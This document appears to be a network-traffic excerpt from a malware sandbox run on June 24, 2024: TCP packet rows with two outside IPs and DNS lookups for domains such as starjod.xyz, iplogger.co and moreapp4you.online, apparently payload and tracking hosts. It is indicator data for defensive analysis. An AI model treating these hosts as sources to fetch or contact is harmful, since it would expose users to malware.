Jun 24, 2024 00:10:22.663333893 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.677131891 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.677180052 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.677190065 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.677258015 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.677268028 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.677278996 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.677285910 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.677289009 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.677314043 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.677356958 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.677377939 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.677793980 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.677840948 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.677886009 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.677897930 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.677908897 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.677911043 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.677932024 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.677978039 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.678004026 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.678014994 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.678029060 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.678037882 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.678054094 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.678132057 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.678136110 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.678147078 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.678158045 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.678169012 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.678209066 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.678237915 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.678247929 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.678257942 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.678258896 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.678268909 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.678281069 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.678329945 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.705254078 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.705287933 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.705358982 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.705384016 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.705395937 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.705403090 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.705403090 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.705430984 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.705454111 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.705514908 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.705514908 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.705514908 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.705514908 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.705533981 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.705545902 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.705558062 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.705566883 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.705596924 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.705661058 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.705687046 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.705703020 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.705713034 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.705724955 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.705735922 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.705748081 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.705750942 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.705750942 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.705807924 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.705807924 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.705910921 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.705921888 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.705933094 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.705941916 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.705959082 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.705971003 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.705979109 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.706010103 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.706010103 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.706010103 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.706060886 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.709006071 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.709014893 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.709022045 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.709052086 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.709064007 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.709098101 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.709146023 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.709156990 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.709167004 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.709183931 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.709208965 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.709292889 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.709604979 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.709623098 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.709635019 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.709645033 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.709708929 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.709717035 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.709717035 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.709719896 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.709769011 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.709775925 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.709775925 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.709780931 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.709791899 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.709826946 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.709867954 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.709878922 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.709888935 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.709913969 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.709913969 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.709965944 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.709978104 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.709988117 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.710004091 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.710043907 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.710045099 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.710086107 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.710095882 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.710107088 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.710115910 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.710128069 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.710139990 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.710161924 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.710163116 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.710161924 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.710197926 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.710268974 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.710283041 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.710302114 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.710318089 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.710326910 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.710339069 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.710339069 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.710361958 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.710372925 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.710383892 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.710386992 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.710386992 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.710417986 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.710418940 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.710429907 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.710442066 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.710459948 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.710459948 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.710519075 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.712521076 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.712559938 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.712590933 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.712603092 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.712620020 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.712635994 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.712646961 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.712667942 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.712668896 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.712722063 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.712733984 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.712737083 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.712743998 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.712755919 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.712800980 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.712817907 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.712827921 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.712837934 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.712853909 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.712855101 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.712868929 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.712877989 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.712879896 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.712902069 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.712944984 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.712944984 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.712980032 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.712991953 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.713001013 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.713012934 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.713022947 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.713035107 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.713040113 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.713061094 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.713185072 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.713402987 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.713504076 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.713515043 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.713525057 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.713530064 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.713536024 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.713547945 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.713558912 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.713562012 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.713571072 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.713592052 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.713592052 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.713676929 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.722714901 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.722776890 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.722786903 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.722824097 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.722882986 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.722887039 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.722910881 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.722923040 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.722937107 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.722964048 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.722970963 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.722975969 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.722987890 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.723000050 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.723001957 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.723001957 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.723040104 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.723045111 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.723056078 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.723067045 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.723076105 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.723083973 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.723104954 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.723119020 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.723160028 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.723208904 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.724387884 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.724416018 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.724426985 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.724517107 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.724529982 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.724540949 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.724553108 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.724560022 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.724584103 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.724590063 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.724590063 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.724611044 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.724723101 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.725074053 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.725121975 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.725131035 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.725167036 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.725178003 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.725194931 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.725243092 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.725243092 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.725277901 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.725291014 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.725301981 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.725368977 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.725481033 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.746031046 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.746092081 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.746104002 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.746170044 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.746181011 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.746191025 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.746193886 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.746193886 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.746201992 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.746213913 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.746221066 CEST	49725	80	192.168.2.5	77.91.77.81

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jun 24, 2024 00:10:14.540896893 CEST	192.168.2.5	1.1.1.1	0x5fec	Standard query (0)	github.com	A (IP address)	IN (0x0001)	false
Jun 24, 2024 00:10:15.803879976 CEST	192.168.2.5	1.1.1.1	0x4588	Standard query (0)	objects.githubusercontent.com	A (IP address)	IN (0x0001)	false
Jun 24, 2024 00:10:16.736258984 CEST	192.168.2.5	1.1.1.1	0xd5cf	Standard query (0)	comrex.pk	A (IP address)	IN (0x0001)	false
Jun 24, 2024 00:10:22.728497028 CEST	192.168.2.5	1.1.1.1	0xcdf6	Standard query (0)	bit.ly	A (IP address)	IN (0x0001)	false
Jun 24, 2024 00:10:23.419766903 CEST	192.168.2.5	1.1.1.1	0x4df3	Standard query (0)	pixel.com	A (IP address)	IN (0x0001)	false
Jun 24, 2024 00:10:26.103864908 CEST	192.168.2.5	1.1.1.1	0xd38d	Standard query (0)	moreapp4you.online	A (IP address)	IN (0x0001)	false
Jun 24, 2024 00:10:29.000716925 CEST	192.168.2.5	1.1.1.1	0xf171	Standard query (0)	github.com	A (IP address)	IN (0x0001)	false
Jun 24, 2024 00:10:30.855745077 CEST	192.168.2.5	1.1.1.1	0x5661	Standard query (0)	starjod.xyz	A (IP address)	IN (0x0001)	false
Jun 24, 2024 00:10:30.856758118 CEST	192.168.2.5	1.1.1.1	0x55e0	Standard query (0)	starjod.xyz	65	IN (0x0001)	false
Jun 24, 2024 00:10:32.333523989 CEST	192.168.2.5	1.1.1.1	0xefd8	Standard query (0)	bitbucket.org	A (IP address)	IN (0x0001)	false
Jun 24, 2024 00:10:33.026228905 CEST	192.168.2.5	1.1.1.1	0xd0c6	Standard query (0)	iplogger.co	A (IP address)	IN (0x0001)	false
Jun 24, 2024 00:10:33.027316093 CEST	192.168.2.5	1.1.1.1	0xbdc0	Standard query (0)	iplogger.co	65	IN (0x0001)	false
Jun 24, 2024 00:10:33.078727961 CEST	192.168.2.5	1.1.1.1	0xd1a1	Standard query (0)	bbuseruploads.s3.amazonaws.com	A (IP address)	IN (0x0001)	false
Jun 24, 2024 00:10:33.606873035 CEST	192.168.2.5	1.1.1.1	0x5913	Standard query (0)	starjod.xyz	A (IP address)	IN (0x0001)	false
Jun 24, 2024 00:10:33.607475996 CEST	192.168.2.5	1.1.1.1	0xfcc8	Standard query (0)	starjod.xyz	65	IN (0x0001)	false
Jun 24, 2024 00:10:36.022687912 CEST	192.168.2.5	1.1.1.1	0xcefb	Standard query (0)	findalltechs.xyz	A (IP address)	IN (0x0001)	false
Jun 24, 2024 00:10:36.023335934 CEST	192.168.2.5	1.1.1.1	0x9139	Standard query (0)	findalltechs.xyz	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jun 24, 2024 00:10:14.553307056 CEST	1.1.1.1	192.168.2.5	0x5fec	No error (0)	github.com		140.82.121.3	A (IP address)	IN (0x0001)	false
Jun 24, 2024 00:10:15.815499067 CEST	1.1.1.1	192.168.2.5	0x4588	No error (0)	objects.githubusercontent.com		185.199.111.133	A (IP address)	IN (0x0001)	false
Jun 24, 2024 00:10:15.815499067 CEST	1.1.1.1	192.168.2.5	0x4588	No error (0)	objects.githubusercontent.com		185.199.110.133	A (IP address)	IN (0x0001)	false
Jun 24, 2024 00:10:15.815499067 CEST	1.1.1.1	192.168.2.5	0x4588	No error (0)	objects.githubusercontent.com		185.199.109.133	A (IP address)	IN (0x0001)	false
Jun 24, 2024 00:10:15.815499067 CEST	1.1.1.1	192.168.2.5	0x4588	No error (0)	objects.githubusercontent.com		185.199.108.133	A (IP address)	IN (0x0001)	false
Jun 24, 2024 00:10:17.423129082 CEST	1.1.1.1	192.168.2.5	0xd5cf	No error (0)	comrex.pk		58.65.168.132	A (IP address)	IN (0x0001)	false
Jun 24, 2024 00:10:22.736748934 CEST	1.1.1.1	192.168.2.5	0xcdf6	No error (0)	bit.ly		67.199.248.11	A (IP address)	IN (0x0001)	false
Jun 24, 2024 00:10:22.736748934 CEST	1.1.1.1	192.168.2.5	0xcdf6	No error (0)	bit.ly		67.199.248.10	A (IP address)	IN (0x0001)	false
Jun 24, 2024 00:10:23.792619944 CEST	1.1.1.1	192.168.2.5	0x4df3	No error (0)	pixel.com		54.67.42.145	A (IP address)	IN (0x0001)	false
Jun 24, 2024 00:10:26.186640978 CEST	1.1.1.1	192.168.2.5	0xd38d	No error (0)	moreapp4you.online		31.31.196.208	A (IP address)	IN (0x0001)	false
Jun 24, 2024 00:10:29.007684946 CEST	1.1.1.1	192.168.2.5	0xf171	No error (0)	github.com		140.82.121.3	A (IP address)	IN (0x0001)	false
Jun 24, 2024 00:10:30.900149107 CEST	1.1.1.1	192.168.2.5	0x5661	No error (0)	starjod.xyz		154.41.249.241	A (IP address)	IN (0x0001)	false
Jun 24, 2024 00:10:32.340223074 CEST	1.1.1.1	192.168.2.5	0xefd8	No error (0)	bitbucket.org		104.192.141.1	A (IP address)	IN (0x0001)	false
Jun 24, 2024 00:10:33.039310932 CEST	1.1.1.1	192.168.2.5	0xd0c6	No error (0)	iplogger.co		172.67.167.249	A (IP address)	IN (0x0001)	false
Jun 24, 2024 00:10:33.039310932 CEST	1.1.1.1	192.168.2.5	0xd0c6	No error (0)	iplogger.co		104.21.82.93	A (IP address)	IN (0x0001)	false
Jun 24, 2024 00:10:33.042144060 CEST	1.1.1.1	192.168.2.5	0xbdc0	No error (0)	iplogger.co			65	IN (0x0001)	false
Jun 24, 2024 00:10:33.098923922 CEST	1.1.1.1	192.168.2.5	0xd1a1	No error (0)	bbuseruploads.s3.amazonaws.com	s3-1-w.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Jun 24, 2024 00:10:33.098923922 CEST	1.1.1.1	192.168.2.5	0xd1a1	No error (0)	s3-1-w.amazonaws.com	s3-w.us-east-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Jun 24, 2024 00:10:33.098923922 CEST	1.1.1.1	192.168.2.5	0xd1a1	No error (0)	s3-w.us-east-1.amazonaws.com		3.5.27.203	A (IP address)	IN (0x0001)	false
Jun 24, 2024 00:10:33.098923922 CEST	1.1.1.1	192.168.2.5	0xd1a1	No error (0)	s3-w.us-east-1.amazonaws.com		16.182.106.153	A (IP address)	IN (0x0001)	false
Jun 24, 2024 00:10:33.098923922 CEST	1.1.1.1	192.168.2.5	0xd1a1	No error (0)	s3-w.us-east-1.amazonaws.com		16.182.72.185	A (IP address)	IN (0x0001)	false
Jun 24, 2024 00:10:33.098923922 CEST	1.1.1.1	192.168.2.5	0xd1a1	No error (0)	s3-w.us-east-1.amazonaws.com		52.216.154.68	A (IP address)	IN (0x0001)	false
